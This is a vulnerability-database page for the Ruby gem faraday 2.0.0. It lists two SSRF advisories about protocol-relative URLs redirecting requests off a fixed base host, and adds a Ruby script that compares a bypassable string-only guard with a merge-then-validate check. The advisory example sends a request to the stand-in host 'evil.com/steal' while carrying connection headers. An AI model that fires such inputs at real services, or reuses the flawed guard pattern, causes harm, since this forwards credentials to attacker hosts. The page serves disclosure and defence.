Package details: pkg:gem/faraday@2.0.0
purl: pkg:gem/faraday@2.0.0
Next non-vulnerable version: 2.14.2
Latest non-vulnerable version: 2.14.2
Risk: 3.1
Vulnerabilities affecting this package (2)
VCID-8d5e-zyuy-53g3
Aliases: CVE-2026-33637, GHSA-5rv5-xj5j-3484

Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2 - protocol-relative URI objects still bypass host scoping

## Summary

`Faraday::Connection#build_exclusive_url` still allows protocol-relative host override when the request target is provided as a `URI` object instead of a `String`. This bypasses the February 2026 fix for `GHSA-33mh-2634-fwr2` and can redirect a request built from a fixed-base `Faraday::Connection` to an attacker-controlled host while preserving connection-scoped headers such as `Authorization`.

## Supporting Materials

- Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2
- Existing CVE for the original string-based issue: CVE-2026-25765
- Existing regression tests for the string-only fix: spec/faraday/connection_spec.rb:314-345
- Existing test proving supported URI request input: spec/faraday/request_spec.rb:26-31

## Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Fixed by: 2.14.2 (this version is affected by 0 other vulnerabilities)
VCID-ycrm-uaf6-73a7
Aliases: CVE-2026-25765, GHSA-33mh-2634-fwr2

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are network-path references: the reference supplies the authority (host, and port if given) and overrides the base URL's authority, while the scheme is still taken from the base. This means that if an application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely.

**Example:**

```ruby
conn = Faraday.new(url: 'https://api.internal.com')
# URI#merge keeps the https scheme but takes the host from the reference: the request goes to https://evil.com/steal
conn.get('//evil.com/steal')
```

Fixed by: 2.14.1 (this version is affected by 2 other vulnerabilities)
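The two advisories above describe one root cause from two angles: `URI#merge` lets a network-path reference's authority replace the base's, and a guard that only inspects String input does nothing for a `URI` object. The following is an added example written for this page, not Faraday's code and not the actual patch; it uses only Ruby's standard `uri` library. `BASE` and the `evil.com` host are constructed sample values, and `escapes_base?`, `string_only_guard` and `host_scoped_merge` are illustrative names. `string_only_guard` is a simplified stand-in for the string-only check the second advisory describes, and `host_scoped_merge` shows the check a practitioner would want instead: validate the merged result's scheme, host and port against the base, which does not depend on the input type.

```ruby
require 'uri'

# Added example; this is not Faraday's code. BASE mirrors the fixed-base
# connection URL from the advisory example; 'evil.com' is the constructed
# attacker host. Function names are illustrative.
BASE = URI('https://api.internal.com/v1/')

# True when a merged URI points somewhere other than the base scheme/host/port.
def off_base?(base, merged)
  merged.scheme != base.scheme || merged.host != base.host || merged.port != base.port
end

# Does plain URI#merge (what build_exclusive_url relies on) send the request
# off the base host? A network-path reference such as "//evil.com/steal" keeps
# the base scheme but replaces the authority, so it escapes; "users" and
# "/users" do not. merge accepts a String or a URI object.
def escapes_base?(base, target)
  off_base?(base, base.merge(target))
end

# A guard that only inspects String input, modelled on the incomplete-fix
# pattern in the second advisory (simplified stand-in, not the real Faraday
# patch). A URI object never reaches the start_with? check, so
# URI('//evil.com/steal') passes straight through to the merge.
def string_only_guard(base, target)
  if target.is_a?(String) && target.start_with?('//')
    raise ArgumentError, "protocol-relative target rejected: #{target}"
  end
  base.merge(target)
end

# Hardened variant: merge first, then validate the result rather than the
# input. Because the check runs on the merged URI it cannot be bypassed by
# changing the input type, and it also catches absolute URLs and explicit ports.
def host_scoped_merge(base, target)
  merged = base.merge(target)
  if off_base?(base, merged)
    raise ArgumentError, "request target escapes #{base.host}: #{merged}"
  end
  merged
end

if __FILE__ == $PROGRAM_NAME
  targets = ['users', '/users', '//evil.com/steal', URI('//evil.com/steal'),
             'https://evil.com/x', '//api.internal.com:8443/v1/users']
  targets.each do |t|
    label = t.is_a?(String) ? t.inspect : "URI(#{t})"
    puts "#{label.ljust(38)} merge -> #{BASE.merge(t)}  escapes? #{escapes_base?(BASE, t)}"
  end
  puts "string-only guard let through: #{string_only_guard(BASE, URI('//evil.com/steal'))}"
  begin
    host_scoped_merge(BASE, URI('//evil.com/steal'))
  rescue ArgumentError => e
    puts "host-scoped merge rejected: #{e.message}"
  end
end
```

Run it with `ruby` to see which targets change the destination. Two details worth noticing: `/users` keeps the host but discards the base path (`/v1/`), so an application that also needs to stay under a path prefix must check the merged path as well; and `//api.internal.com:8443/v1/users` is caught by the port comparison even though the host matches, which a host-only check would miss.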
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-05T22:04:40.607387+00:00 | GHSA Importer | Affected by | VCID-8d5e-zyuy-53g3 | https://github.com/advisories/GHSA-5rv5-xj5j-3484 | 38.6.0 |
| 2026-06-05T21:58:34.883350+00:00 | GHSA Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://github.com/advisories/GHSA-33mh-2634-fwr2 | 38.6.0 |
| 2026-06-04T18:16:00.869662+00:00 | Ruby Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml | 38.6.0 |
| 2026-06-04T16:14:41.716932+00:00 | Ruby Importer | Affected by | VCID-8d5e-zyuy-53g3 | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-33637.yml | 38.6.0 |
| 2026-06-02T04:50:01.809075+00:00 | GitLab Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/faraday/CVE-2026-25765.yml | 38.6.0 |